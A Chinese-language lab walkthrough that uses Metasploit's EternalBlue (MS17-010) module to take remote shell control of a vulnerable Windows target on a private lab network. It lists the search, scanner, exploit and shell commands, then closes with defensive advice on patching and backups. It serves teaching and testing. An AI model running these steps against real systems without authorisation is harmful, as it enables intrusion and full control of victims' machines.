目录
漏洞介绍:
2008年Ms08-067漏洞爆发之后不到10年,2017年4月14日晚,黑客组织 Shadow Brokers(影子经纪人)公布了一大批网络攻击工具,其中就包含“永恒之蓝”工具,它利用Windows操作系统的SMB漏洞(MS17 010)可以获取系统最高权限。多国均遭遇到黑 客利用“永恒之蓝”工具进行的袭击,包括活银行、电力系统、通信系统、能源企业、机场等重要基础设施都被波及,接下来我Ms17_010漏洞演示一下metasploit的渗透过程。
实验环境:
kali主机IP:192.168.245.139
靶机(有MS17_010漏洞):192.168.245.156
实验步骤:
- 启动metasploit:msfconsole
- 查找漏洞:search smb_ms17_010
- 加载检测到的漏洞:use auxiliary/scanner/smb/smb_ms17_010
- 对目标主机进行扫描并对其进行攻击一下(run):set rhosts 192.168.245.156
- 进行攻击后发现没有进入会话,原来是没有加载攻击模块现查找相关模块:search ms17_010
- 载入ms17_010_eternalblue渗透模块:use exploit/windows/smb/ms17_010_eternalblue
- 再设置攻击目标主机后开始攻击:run
- 进入会话:shell 控制靶机,此时我们就可以远程控制目标机,为所欲为
实验结束
总结:
网络安全离不开操作系统,操作系统对网络安全有着非常重要的影响,许多网络攻击都是从寻找系统的缺陷入手的。在漏洞、攻击发生时,尽量避免使用发生漏洞的操作系统,或者根据漏洞补救方法对自己电脑的操作系统进行修复,尽量避免在漏洞未修复时登录个人隐私性账户;重要数据一定要定期做好备份,一天一备或一小时一备,最好做到异地备份,不要备份在同一台服务器上,万一数据被删除或被入侵挟持,备份在异地的数据能保证安全;除了重视被漏洞入侵的危害,还要防范恶意攻击,选择高防服务器有效防御DDoS、CC、WinNuke等各类攻击,在漏洞及攻击发生的第一时间能够迅速应对,从而减少甚至避免损失。